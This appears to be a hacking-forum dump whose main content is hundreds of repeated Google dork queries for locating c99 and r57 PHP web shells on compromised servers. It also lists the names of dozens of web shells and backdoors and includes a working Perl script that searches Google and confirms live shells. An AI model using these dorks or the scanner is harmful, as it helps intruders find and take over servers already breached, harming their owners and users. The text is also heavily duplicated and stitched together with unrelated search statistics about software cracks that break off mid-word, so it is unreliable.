allinurl:c99.php # inurl:"c99.php" # inurl:"c99.php" # allinurl:c99.php # allinurl:c99.php? # allinurl:c99.php? # allinurl:c99.php? # "inurl:c99..php" # allinurl:c99.php # c99shell [file on secure ok ]? # inurl:c99.php # inurl:c99.php # inurl:c99.php # inurl:c99.php # inurl:c99.php # inurl:c99.php # inurl:c99.php # inurl:c99.php # powered by Captain Crunch Security Team # allinurl:c99.php # "c99.php" filetype:php # allinurl:c99.php # inurl:c99.php # allinurl:.c99.php # "inurl:c99.php" # c99. PHP-code Feedback Self remove # allinurl:c99.php # download c99.php # allinurl:c99.php # inurl:c99.php # allinurl: "c99.php" # allinurl:c99.php # allinurl:c99.php # c99shell # inurl:c99.php # inurl:c99.php # intitle:C99Shell v. 1.0 pre-release +uname # allinurl:"c99.php" # inurl:c99.php # inurl:c99.php # inurl:c99.php # inurl:c99.php # safe-mode: off (not secure) drwxrwxrwx c99shell # inurl:/c99.php # inurl:"c99.php" # inurl:c99.php # inurl:c99.php # c99.php download # inurl:c99.php # inurl:"c99.php" # inurl:/c99.php # inurl:"c99.php?" # inurl:c99.php # inurl:c99.php # files/c99.php # c99shell filetype:php -echo # c99shell powered by admin # inurl:c99.php # inurl:c99.php # inurl:"c99.php" # inurl:c99.php uid=0(root) # allinurl:c99.php # inurl:"c99.php" # inurl:"c99.php" # inurl:"/c99.php" intitle:"C99shell" # inurl:"/c99.php" intitle:"C99shell" # inurl:"/c99.php" intitle:"C99shell" # C99Shell v. 1.0 pre-release build #5 # inurl:c99.php # inurl:c99.php # --[ c99shell v. 1.0 pre-release build #16 # c99shell linux infong # c99shell linux infong # C99Shell v. 1.0 pre-release build # !C99Shell v. 1.0 beta! # Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout # !c99shell v. 1+Safe-mode: OFF (not secure) # "C99Shell v. 1.0 pre-release build " # intitle:c99shell +filetype:php # inurl:c99.php # intitle:C99Shell v. 1.0 pre-release +uname # "Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout # Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout # intitle:!C99Shell v. 1.0 pre-release build #16! root # !C99Shell v. 1.0 pre-release build #5! # inurl:"c99.php" # C99Shell v. 1.0 pre-release build #16! # c99shell v. 1.0 pre-release build #16 # intitle:c99shell intext:uname # allintext:C99Shell v. 1.0 pre-release build #12 # c99shell v. 1.0 pre-release build #16 # --[ c99shell v. 1.0 pre-release build #15 | Powered by ]-- # allinurl: "c99.php" # allinurl: "c99.php" # Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout # "c99shell v 1.0" # ftp apache inurl:c99.php # c99shell+v.+1.0 16 # C99Shell v. 1.0 pre-release build #16 download # intitle:c99shell "Software: Apache" # allinurl: c99.php # allintext: Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout # powered by Captain Crunch Security Team # powered by Captain Crunch Security Team # !C99Shell v. 1.0 pre-release build #5! # c99shell v. 1.0 release security # c99shell v. 1.0 pre-release build # inurl:c99.php # c99shell [file on secure ok ]? # C99Shell v. 1.3 # Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout # inurl:c99.php uid=0(root) # powered by Captain Crunch Security Team # C99Shell v. 1.0 pre-release build #16 # c99shell[on file]ok # c99shell[file on ]ok # Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout # inurl:c99.php # "C99Shell v. 1.0 pre" # =C99Shell v. 1.0 pre-release # Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout # c99shell v. pre-release build # inurl:c99.php c99 shell # inurl:c99.php c99 shell # powered by Captain Crunch Security Team # inurl:c99.php # inurl:c99.php # !C99Shell v. 1.0 pre-release build #5! # intitle:"c99shell" filetype:php root # intitle:"c99shell" Linux infong 2.4 # C99Shell v. 1.0 beta ! # C99Shell v. 1.0 pre-release build # # inurl:"c99.php" # allintext:C99Shell v. 1.0 pre-release build #12 # "C99Shell v. 1.0 pre" # powered by Captain Crunch Security Team # Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout # inurl:/c99.php? # allinurl:c99.php # intitle:C99Shell pre-release # inurl:"c99.php" # powered by Captain Crunch Security Team # inurl:c99.php # C99Shell v. 1.0 pre-release build #16! # allinurl:c99.php # C99Shell v. 1.0 pre-release build #16 administrator # intitle:c99shell filetype:php # powered by Captain Crunch Security Team # powered by Captain Crunch Security Team # C99Shell v. 1.0 pre-release build #12 # c99shell v.1.0 # allinurl:c99.php # "c99shell v. 1.0 pre-release build" # inurl:"c99.php" filetype:php # "c99shell v. 1.0 " # ok c99.php # Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout # c99shell v. 1.0 pre-release build #16 | # !C99Shell v. 1.0 pre-release build #5! # !C99Shell v. 1.0 pre-release build #5! # allinurl:/c99.php # powered by Captain Crunch Security Team # inurl:c99.php # Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout # inurl:c99.php # powered by Captain Crunch Security Team # inurl:c99.php # C99Shell v. 1.0 pre-release # inurl:c99.php # inurl:c99.php ext:php # inurl:"c99.php" # allinurl:"c99.php" # Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout # powered by Captain Crunch Security Team # Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout # Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout" # C99Shell v. 1.0 pre-release build #16 software apache # Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout # "c99shell v 1.0" # inurl:"c99.php" # allintitle: C99shell filetype:php # C99Shell v. 1.0 pre-release build #16! # "c99shell v. 1.0 pre-release" # c99shell v. 1.0 pre-release build #5 # allinurl:"c99.php" filetype:php # Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout # Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout # !C99Shell v. 1.0 pre-release build #16! # inurl:c99.php # intitle:C99Shell v. 1.0 pre-release +uname # inurl:c99.php # c99shell v. 1.0 # allinurl: c99.php # --[ c99shell v. 1.0 pre-release build #16 powered by Captain Crunch Security Team | ]-- # inurl:"/c99.php" # c99shell +uname # c99shell php + uname # c99shell php + uname # --[ c99shell v. 1.0 pre-release build #16 powered by Captain Crunch Security Team | ]-- # allinurl:c99.php # !C99Shell v. 1.0 pre-release build #5! # C99Shell v.1.0 pre-release # Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout # inurl:c99.php # intitle:c99shell filetype:php # "Encoder Tools Proc. FTP brute" # "c99" filetype:php intext:"Safe-Mode: OFF" # c99shell v. 1.0 pre # inurl:c99.php # intitle:c99shell uname -bbpress # intitle:"index.of" c99.php # inurl:admin/files/ # intitle:"index of /" "c99.php" # intitle:"index of" intext:c99.php # intitle:index.of c99.php # intitle:"index of" + c99.php # intitle:index/of file c99.php # intitle:index/of file c99.php # index of /admin/files/ # intitle:"Index of/"+c99.php # c99.php "intitle:Index of " # c99.php "intitle:Index of " # c99.php "intitle:Index of " # intitle:index.of c99.php # img/c99.php # intitle:index.of c99.php # img.c99.php # intitle:"Index of/"+c99.php # "index of /" c99.php # c99.php # intitle:"Index of" c99.php # "index of" c99.php # "Index of/"+c99.php[/hide] # # # Shell Dork # # ============================================================= # # # # Shell Dork # # inurl:"c99.php" inurl:c99.php inurl:c99.php inurl:c99.php allinurl:c99.php inurl:"c99.php" inurl:c99.php intitle:c99shell uname c99shell v.1.0 (roots) inurl:/c99.php allinurl:.c99.php allinurl:.c99.php intitle:C99Shell allintitle:"C99Shell" allintitle:"C99Shell" c99.php ccteam.ru c99.php # intext:c99shell inurl:c99.php # !C99Shell v. 1.0 pre-release build #16! # intitle:c99shell filetype:php # intitle:c99shell filetype:php # inurl:c99.php # inurl:c99.php # inurl:c99.php # inurl:c99.php # inurl:c99.php # inurl:c99.php # inurl:c99.php # inurl:"/c99.php" # inurl:c99.php # inurl:"/c99.php" # inurl:"c99.php" # inurl:"c99.php" # inurl:"c99.php" # inurl:c99.php # inurl:c99.php # allinurl:c99.php # inurl:c99.php # inurl:c99.php # c99shell v. 1.0 pre-release build #5 # inurl:c99.php # inurl:c99.php # c99.php v. # C99Shell # inurl:c99.php # inurl:c99.php # c99shell # c99shell # c99shell # allinurl:"c99.php" # "inurl:C99.php" # inurl:"c99.php" # inurl:"c99.php" # "inurl:c99.php" + "intext:safe" # inurl:c99.php # allinurl:c99.php # ext:php inurl:c99.php # inurl:"c99.php" # "inurl:/c99.php # --[ c99shell v. 1.0 pre-release build #12 powered by Captain Crunch Security Team # inurl:/c99.php # inurl:/c99.php # C99Shell v. 1.0 pre-release build #12 # C99Shell v. 1.0 pre-release build #12 # inurl:c99.php # inurl:c99.php? # c99.php # inurl:"/c99.php" # inurl:"/c99.php" # c99.php download # inurl:c99.php # inurl:c99.php # inurl:c99.php # (intitle:r57shell | intitle:c99shell) +uname # (intitle:r57shell | intitle:c99shell) +uname # allinurl:c99.php # "c99shell" # inurl:minimail c99 # inurl:minimail c99 # inurl:c99.php # !C99Shell v. 1.0 pre-release build # +php -htm -html -shtml # allintitle: c99shell filetype:php # inurl:/c99.php # inurl:c99.php # inurl:c99.php # inurl:c99.php # intitle:c99shell inurl:c99.php # inurl:c99.php uid=0(root) # inurl:c99.php # inurl:c99.php # inurl:c99.php uid=0(root) # inurl:c99.php # inurl:/files/c99.php # inurl:c99.php # inurl:"c99.php" # inurl:c99.php site:.fr # inurl:/files/c99.php # allinurl:c99.php # inurl:./c99.php # intitle:c99shell safe-mode:OFF # inurl:c99.php # c99.php "uid=0" # c99.php "uid=0" # c99.php "uid=0" # c99.php "uid=0" # inurl:c99.php # inurl:c99.php # powered by Captain Crunch Security Team # inurl:c99 filetype:php minimail # allinurl:c99.php # safe-mode: off (not secure) drwxrwxrwx c99shell # inurl:c99.php # inurl:c99.php uid=0(root) # root c99.php # "Captain Crunch Security Team" inurl:c99 # download c99.php # download c99.php # download c99.php # inurl:c99.php # inurl:c99.php # allinurl: c99.php # inurl:c99.php # allinurl: c99.php # inurl:"/c99.php" # allinurl: c99.php # inurl:c99.php # inurl:"c99.php" c99shell # inurl:c99.php uid=0(root) # c99shell powered by admin # c99shell powered by admin # inurl:"/c99.php" # inurl:c99.php # inurl:c99.php # inurl:c99.php # c99 shell v.1.0 (roots) # inurl:c99.php # allintitle: "c99shell" # inurl:"c99.php # inurl:"c99.php # allinurl: "c99.php" # inurl:c99.php # intitle:C99Shell v. 1.0 pre-release +uname # intitle:C99Shell v. 1.0 pre-release +uname # allinurl: "c99.php" # inurl:c99.php # inurl:"c99.php" # inurl:"c99.php" # inurl:c99.php # inurl:c99.php # inurl:c99.php # inurl:c99.php # inurl:"c99.php" c99shell # inurl:c99.php # inurl:"c99.php" # allinurl:c99.php # inurl:"/c99.php # inurl:c99.php? # inurl:/c99.php+uname # allinurl:"c99.php" # allinurl:c99.php # inurl:"c99.php" # inurl:"c99.php" # allinurl:c99.php # allinurl:c99.php? # allinurl:c99.php? # allinurl:c99.php? # "inurl:c99..php" # allinurl:c99.php # c99shell [file on secure ok ]? # inurl:c99.php # inurl:c99.php # inurl:c99.php # inurl:c99.php # inurl:c99.php # inurl:c99.php # inurl:c99.php # inurl:c99.php # powered by Captain Crunch Security Team # allinurl:c99.php # "c99.php" filetype:php # allinurl:c99.php # inurl:c99.php # allinurl:.c99.php # "inurl:c99.php" # c99. PHP-code Feedback Self remove # allinurl:c99.php # download c99.php # allinurl:c99.php # inurl:c99.php # allinurl: "c99.php" # allinurl:c99.php # allinurl:c99.php # c99shell # inurl:c99.php # inurl:c99.php # intitle:C99Shell v. 1.0 pre-release +uname # allinurl:"c99.php" # inurl:c99.php # inurl:c99.php # inurl:c99.php # inurl:c99.php # safe-mode: off (not secure) drwxrwxrwx c99shell # inurl:/c99.php # inurl:"c99.php" # inurl:c99.php # inurl:c99.php # c99.php download # inurl:c99.php # inurl:"c99.php" # inurl:/c99.php # inurl:"c99.php?" # inurl:c99.php # inurl:c99.php # files/c99.php # c99shell filetype:php -echo # c99shell powered by admin # inurl:c99.php # inurl:c99.php # inurl:"c99.php" # inurl:c99.php uid=0(root) # allinurl:c99.php # inurl:"c99.php" # inurl:"c99.php" # inurl:"/c99.php" intitle:"C99shell" # inurl:"/c99.php" intitle:"C99shell" # inurl:"/c99.php" intitle:"C99shell" # C99Shell v. 1.0 pre-release build #5 # inurl:c99.php # inurl:c99.php # --[ c99shell v. 1.0 pre-release build #16 # c99shell linux infong # c99shell linux infong # C99Shell v. 1.0 pre-release build # !C99Shell v. 1.0 beta! # Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout # !c99shell v. 1+Safe-mode: OFF (not secure) # "C99Shell v. 1.0 pre-release build " # intitle:c99shell +filetype:php # inurl:c99.php # intitle:C99Shell v. 1.0 pre-release +uname # "Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout # Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout # intitle:!C99Shell v. 1.0 pre-release build #16! root # !C99Shell v. 1.0 pre-release build #5! # inurl:"c99.php" # C99Shell v. 1.0 pre-release build #16! # c99shell v. 1.0 pre-release build #16 # intitle:c99shell intext:uname # allintext:C99Shell v. 1.0 pre-release build #12 # c99shell v. 1.0 pre-release build #16 # --[ c99shell v. 1.0 pre-release build #15 | Powered by ]-- # allinurl: "c99.php" # allinurl: "c99.php" # Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout # "c99shell v 1.0" # ftp apache inurl:c99.php # c99shell+v.+1.0 16 # C99Shell v. 1.0 pre-release build #16 download # intitle:c99shell "Software: Apache" # allinurl: c99.php # allintext: Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout # powered by Captain Crunch Security Team # powered by Captain Crunch Security Team # !C99Shell v. 1.0 pre-release build #5! # c99shell v. 1.0 release security # c99shell v. 1.0 pre-release build # inurl:c99.php # c99shell [file on secure ok ]? # C99Shell v. 1.3 # Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout # inurl:c99.php uid=0(root) # powered by Captain Crunch Security Team # C99Shell v. 1.0 pre-release build #16 # c99shell[on file]ok # c99shell[file on ]ok # Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout # inurl:c99.php # "C99Shell v. 1.0 pre" # =C99Shell v. 1.0 pre-release # Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout # c99shell v. pre-release build # inurl:c99.php c99 shell # inurl:c99.php c99 shell # powered by Captain Crunch Security Team # inurl:c99.php # inurl:c99.php # !C99Shell v. 1.0 pre-release build #5! # intitle:"c99shell" filetype:php root # intitle:"c99shell" Linux infong 2.4 # C99Shell v. 1.0 beta ! # C99Shell v. 1.0 pre-release build # # inurl:"c99.php" # allintext:C99Shell v. 1.0 pre-release build #12 # "C99Shell v. 1.0 pre" # powered by Captain Crunch Security Team # Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout # inurl:/c99.php? # allinurl:c99.php # intitle:C99Shell pre-release # inurl:"c99.php" # powered by Captain Crunch Security Team # inurl:c99.php # C99Shell v. 1.0 pre-release build #16! # allinurl:c99.php # C99Shell v. 1.0 pre-release build #16 administrator # intitle:c99shell filetype:php # powered by Captain Crunch Security Team # powered by Captain Crunch Security Team # C99Shell v. 1.0 pre-release build #12 # c99shell v.1.0 # allinurl:c99.php # "c99shell v. 1.0 pre-release build" # inurl:"c99.php" filetype:php # "c99shell v. 1.0 " # ok c99.php # Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout # c99shell v. 1.0 pre-release build #16 | # !C99Shell v. 1.0 pre-release build #5! # !C99Shell v. 1.0 pre-release build #5! # allinurl:/c99.php # powered by Captain Crunch Security Team # inurl:c99.php # Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout # inurl:c99.php # powered by Captain Crunch Security Team # inurl:c99.php # C99Shell v. 1.0 pre-release # inurl:c99.php # inurl:c99.php ext:php # inurl:"c99.php" # allinurl:"c99.php" # Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout # powered by Captain Crunch Security Team # Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout # Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout" # C99Shell v. 1.0 pre-release build #16 software apache # Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout # "c99shell v 1.0" # inurl:"c99.php" # allintitle: C99shell filetype:php # C99Shell v. 1.0 pre-release build #16! # "c99shell v. 1.0 pre-release" # c99shell v. 1.0 pre-release build #5 # allinurl:"c99.php" filetype:php # Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout # Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout # !C99Shell v. 1.0 pre-release build #16! # inurl:c99.php # intitle:C99Shell v. 1.0 pre-release +uname # inurl:c99.php # c99shell v. 1.0 # allinurl: c99.php # --[ c99shell v. 1.0 pre-release build #16 powered by Captain Crunch Security Team | ]-- # inurl:"/c99.php" # c99shell +uname # c99shell php + uname # c99shell php + uname # --[ c99shell v. 1.0 pre-release build #16 powered by Captain Crunch Security Team | ]-- # allinurl:c99.php # !C99Shell v. 1.0 pre-release build #5! # C99Shell v.1.0 pre-release # Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout # inurl:c99.php # intitle:c99shell filetype:php # "Encoder Tools Proc. FTP brute" # "c99" filetype:php intext:"Safe-Mode: OFF" # c99shell v. 1.0 pre # inurl:c99.php # intitle:c99shell uname -bbpress # # # ============================================================== # # # # - C99madShell v. 2.0 madnet edition # - c99-safe-mode # - c99edit # - c99shell # - DownloaderToFTP # - GFS Web-Shell ver 4.0.0.0 # - NetworkFileManager # - NiX Remote Web Shell™ # - r57MySQL_FileViewer # - r57shell # - MySQLBackUpAll # - MySQLBackUpOnce # - Sql # - a_gedit # - Antichat # - bk # - c2007 # - Casus15 # - CmdAsp # - Csh # - Ctt_sh # - Cybershell # - DxShell # - gfs_sh # - grp-2018 # - Hidshell # - iMHaPFtp # - Load_shell # - NFM # - NGH # - Nixrem # - NST # - Phvayvv # - Predator # - r0t # - Remview # - Zacosmall # - Rashell v.1.31 # - Xoce 1.5 # - Xoce 1.7 # - img # - mailer3 # - myshell # - mysql_tool # - mysql # - network # - nshell # - ru24_post_sh # - pHpINJ # - PHP Shell # - Pws # - KA_uShell # - Sincap # - telnet # - telnetd # - smtpd.py # - xinfo # - CyberSpy5.Asp # - Indexer.asp # - Klasvayv.asp # - NTdaddy.asp # - Reader.asp # - RemExp.asp # - Zehir4.asp # - Ajan.asp # - EFSO_2.asp # - Elmali Seker.asp # - Server Variables.asp # - Tool.asp # - WebShell.pl # - PHP Backdoor Connect.pl # - perlbot.pl # - shellbot.pl # - r57pws.pl # - lurm_safemod_on.pl # - Asmodeus v0.1.pl # - connectback2.pl # - Java Shell.js # - Phyton Shell.py # - cgi-python.py # # [ С # # ============================================================== # # Ajan.asp # Asmodeus v0.1.pl # backup.php # backupsql.php # Blind Shell.cpp # c2007.php # c99.php # c99shell.php # Casus15.php # cgi-python.py # CMD.asp # CmdAsp.asp # connectback2.pl # ctt_sh.php # CyberEye.asp # cybershell.php # CyberSpy5.Asp # Dx.php # DxShell_hk.php # EFSO_2.asp # Elmali Seker.asp # elmaliseker.asp # gfs_sh.php # img.php # iMHaPFtp.php # Inderxer.asp # indexer.asp # Java Shell.js # Klasvayv.asp # load_shell.php # lurm_safemod_on.cgi # mailer3.php # myshell.php # mysql.php # mysql_tool.php # network.php # Nshell (1).php # nshell.php # nstview.php # NT Addy.asp # ntdaddy.asp # perlbot.pl # PH Vayv.php # PHP Backdoor Connect.pl # PHP Shell.php # pHpINJ.php # phpshell.php # phvayv.php # Phyton Shell.py # pws.php # r57 Shell.php # r57pws.pl # r57shell.php # Rader.asp # reader.asp # Rem Exp.asp # Rem View.php # RemExp.asp # remview.php # ru24_post_sh.php # Russian.php # s.php # Server Variables.asp # shell.php # shellbot.pl # Sincap.php # smtpd.py # telnet.cgi # telnet.pl # telnetd.pl # Test.php # Tool.asp # Uploader.php # WebShell.cgi # xinfo.php # zacosmall.php # Zehir 4.asp # zehir4.asp # # ============================================================== # # Hits Search String # ---------------- ---------------------- # # 33 28.45% powered by captain crunch security team # 6 5.17% safe-mode: off (not secure) # 5 4.31% home # 4 3.45% basel 2.2 # 4 3.45% safe-mode: off (not secure) drwxrwxrwx # 3 2.59% c99memoryl # 3 2.59% c99shell [file on secure ok ] # 3 2.59% c99shell v. 1.0 pre-release build #16 # 3 2.59% hacker # 3 2.59% uid=99(nobody) gid=99(nobody) groups=99(nobody) # 2 1.72% --[ c99shell v. 1.0 pre-release build #16 # 2 1.72% basel # 2 1.72% c99shell v. 1.0 pre-release build # 2 1.72% powered by captain crunch security team | http://ccteam.ru | # 2 1.72% safe-mode : off ( not secured ) drwxrwxrwx # 2 1.72% safe-mode: off (not secure) drwxrwxrwx c99shell # 1 0.86% !c99shell v. 1.0 pre-release build #16! # 1 0.86% --[ c99shell v. 1.0 pre-release build # 1 0.86% -[ c99shell v. 1.0 pre-release build #16 powered by captain cru # 1 0.86% /opt/zope/lib/python/zdaemon/zdrun.py # 1 0.86% allintext:â€�safe-mode: off (not secure)â€� # 1 0.86% allinurl:selfremove # 1 0.86% basel documentation # 1 0.86% c99memory.php # 1 0.86% c99shell safe-mode : off ( not secured ) drwxrwxrwx # 1 0.86% c99shell v. 1.0 pre-release build #16 powered by captain crunch # 1 0.86% c99shell v. 1.0 pre-release uname # 1 0.86% c99shell v. pre-release build # 1 0.86% captain crunch security team # 1 0.86% code safe-mode: off (not secure) drwxrwxrwx c99shell # 1 0.86% drwxrwxrwx c99shell filetype:php # 1 0.86% encoder bind proc. ftp brute sec. sql php-code feedback self re # 1 0.86% encoder tools proc. ftp brute sec. sql php-code update feedback # 1 0.86% home updir search buffer tools proc ftp brute sec sql self remo # 1 0.86% how to restore using !c99memory v. 1.0 pre-release build #16! # 1 0.86% intext:c99memory v. 1.0 # 1 0.86% intext:safe-mode: off (not secure) # 1 0.86% intext:safe-mode: off (not secure) tooling # 1 0.86% inurl:act=sql # 1 0.86% name asc. size · modify · owner/group · perms action # 1 0.86% php safe-mode drwxrwxrwx # 1 0.86% php4 timezone database # 1 0.86% powered by captain crunch security team drwxrwxrwx # 1 0.86% powered by captain crunch security team | http://ccteam.ru # 1 0.86% safe mode: off ( not secure ) # 1 0.86% safe mode: off (not secure) # 1 0.86% safe-mode: off (not secure) / tmp/ drwxrwxrwx # 1 0.86% safe-mode: off (not secure) site:pt # 1 0.86% shell powered by captain crunch security team # 1 0.86% site:www.astro.mat.uc.pt basel # 1 0.86% uid= gid= groups= sql uname -a # 1 0.86% uid=99 ( nobody ) gid=99 ( nobody ) # 1 0.86% uid=99(nobody) gid=99(nobody) groups=99(nobody)safe-mode: off ( # # now finish "bbbbbbb bay" good lock www.saudihack.com # # p o w e r b y ,,,,,...maxhex,,,,,... ============================================================================ دوركات جديده Code: #!/usr/bin/perl use strict; use warnings; use LWP::UserAgent; usage() unless $ARGV[2]; my @searchTerm; my @checkTerm; if(lc($ARGV[0]) eq "r57") { push(@searchTerm, "inurl:r57.php"); push(@searchTerm, "\"[ phpinfo ] [ php.ini ] [ cpu ] [ mem ] [ users ] [ tmp ] [ delete ]\""); push(@searchTerm, "intitle:r57shell"); push(@checkTerm, "r57"); push(@checkTerm, "safe_mode"); } elsif(lc($ARGV[0]) eq "c99") { push(@searchTerm, "inurl:c99.php"); push(@searchTerm, "\"Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout\""); push(@searchTerm, "intitle:\" - phpshell\""); push(@searchTerm, "intitle:\" - c99shell\""); push(@checkTerm, "c99"); push(@checkTerm, "Safe-mode"); } elsif(lc($ARGV[0]) eq "mys") { push(@searchTerm, "\"Auto error traping enabled\""); push(@searchTerm, "intitle:\"MyShell 1.1.0 build 20010923\""); push(@checkTerm, "MyShell"); push(@checkTerm, "Echo commands"); } elsif(lc($ARGV[0]) eq "phs") { push(@searchTerm, "intitle:\"PHP Shell 1.5\""); push(@searchTerm, "intitle:\"PHP Shell 1.6\""); push(@searchTerm, "intitle:\"PHP Shell 1.7\""); push(@searchTerm, "\"Enable stderr-trapping?\""); push(@checkTerm, "PHP Shell"); push(@checkTerm, "Choose new working"); } elsif(lc($ARGV[0]) eq "phm") { push(@searchTerm, "\"PHPShell by Macker\""); push(@searchTerm, "\"[ Main Menu ] [ PHPKonsole ] [ Haxplorer ]\""); push(@checkTerm, "Haxplorer"); push(@checkTerm, "PHPKonsole"); } elsif(lc($ARGV[0]) eq "rem") { push(@searchTerm, "intitle:\"phpRemoteView: \""); push(@searchTerm, "\"REMVIEW TOOLS\""); push(@checkTerm, "phpRemoteView"); push(@checkTerm, "perms"); } if(!@searchTerm) { print "Error: [shell to find] is a unknown shell\n" and die; } my $outputOn; if(lc($ARGV[1]) eq "on") { $outputOn = 1; } elsif(lc($ARGV[1]) eq "off") { $outputOn = 0; } else { print "Error: [screen output] must be \"on\" or \"off\"\n" and die; } my $outputFile; if(index(lc($ARGV[2]), ".htm") > 0) { $outputFile = $ARGV[2]; } else { print "Error: [output HTML file] must be *.htm or *.html\n" and die; } open(FILEHANDLE, ">$outputFile"); print FILEHANDLE "PHP Shell's\n"; close FILEHANDLE; my $userAgent = LWP::UserAgent->new; $userAgent->agent("User-Agent=Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.5) Gecko/20061201 Firefox/2.0.0.5"); my @resultLinks; foreach(@searchTerm) { print "[*] Query for \"$_\"\n" if($outputOn == 1); my $isLastPage = 0; for(my $gPage = 0; ; $gPage++) { if($isLastPage == 1) { last; } my $gRequest = HTTP::Request->new(GET => "http://www.google.de/search?q=$_&start=$gPage"."0"); my $gResource = $userAgent->request($gRequest); if($gResource->is_success) { my @gContent = split("
", $gResource->content); if(@gContent < 10) { $isLastPage = 1; }; for(my $gPiece = 1; $gPiece < @gContent; $gPiece++) { my $shellLink = substr($gContent[$gPiece], index($gContent[$gPiece], "href=\"") + 6); $shellLink = substr($shellLink, 0, index($shellLink, "\"")); print "[*] Check status of site \"$shellLink\"\n" if($outputOn == 1); my $sRequest = HTTP::Request->new(GET => $shellLink); my $sResource = $userAgent->request($sRequest); if($sResource->is_success) { if(index($sResource->content, $checkTerm[0]) != -1 && index($sResource->content, $checkTerm[1]) != -1) { open(FILEHANDLE, ">>$outputFile"); print FILEHANDLE "Link: $shellLink
\n"; print FILEHANDLE "Search Term: $_

\n"; close FILEHANDLE; print "[+] Found shell: $shellLink\n" if($outputOn == 1); } else { print "[-] No shell\n" if($outputOn == 1); } } else { print "[-] Offline\n" if($outputOn == 1); } } sleep 20; #wait 20 seconds so google dont think we are a bot } else { print "Unable to query google\n" and die; } } } open(FILEHANDLE, ">>$outputFile"); print FILEHANDLE "

Find PHP Shells via Google - by DiA/RRLF
"; close FILEHANDLE; sub usage { print qq( Find PHP Shells via Google - by DiA/RRLF (http://www.vx-dia.de.vu) Usage: perl $0 [shell to find] [screen output] [output HTML file] [shell to find] can be: r57 - find r57shell c99 - find c99shell mys - find MyShell phs - find PHP Shell phm - find PHPShell (Macker) rem - find phpRemoteView [screen output] can be: on - every step the script doas get printed on the screen off - no output, the script just writes to the output file [output HTML file] must be: *.htm or *.html Example: perl $0 c99 on c99shells.htm perl $0 mys off manyshells.htm ============================================================================ Listados de urls autorizadas para el sitemap ============================================================================ Hits Search String ---------------- ---------------------- 1 0.00% instalador viewcam pro a4 download 1 0.00% instaladores gratis para ares 1.9.1.3010 1 0.00% instalando after effects cs3 sem cd 1 0.00% instalando o dk hack/como usar 1 0.00% instalando skins para temas motorola k1 uol 1 0.00% instalar 1 0.00% instalar ba- 1 0.00% instalar cam creaty qc pass 1 0.00% instalar crack de spicemaster 1 0.00% instalar picsel viewer .jar 1 0.00% instalar programa de duplicar mobis de graça de habbo 1 0.00% instalar webcam vx-2 powerpack 1 0.00% instalare windovs vista 1 0.00% instalaçao de cam web usb 1 0.00% instalaçao do auto cad2007 e numero de serial 1 0.00% instalação celular motorolav3 1 0.00% instalação dr hank vp-eye 4.0 1 0.00% instalação pin allline bluetooth 1 0.00% instalação quickreport 3.6.2 1 0.00% instalação software gratuita do webcam goldship 1 0.00% instale dvd cloner 3.06 pero no se como crackearlo 1 0.00% instalei o programa dvd audio extractor v2.3.0 mais agora ele t 1 0.00% instaliranje za getea vaj siti 1 0.00% install crack acdlabs 9 1 0.00% install files flashchat.php 4.3.2 1 0.00% install rational rose 2002 1 0.00% installation code emule 1.2b crack 1 0.00% installation electrique filetype: dwg 1 0.00% installation superchargers vortex fj cruiser 1 0.00% installer patch cafesuite 1 0.00% installing games on sgh-u700 using samsung pc3 1 0.00% installing pvl ignition 250r 1 0.00% installing trailer wireing harness honda civic 1 0.00% installshield 11 94fbr 1 0.00% installshield 11 intext:rapidshare.com/files 1 0.00% installshield 11 serial 1 0.00% installshield 11 serial number 1 0.00% instant lock con contraseña pirata 1 0.00% instant password finder foro 1 0.00% instant password finder نرم افزار 1 0.00% instant password نرم افزار 1 0.00% instant-lock-3 rapidshare.com/files- 1 0.00% instrucciones memoriesontv4 1 0.00% instrucciones para entrar a media player de un sprint a900 1 0.00% instruccions ab 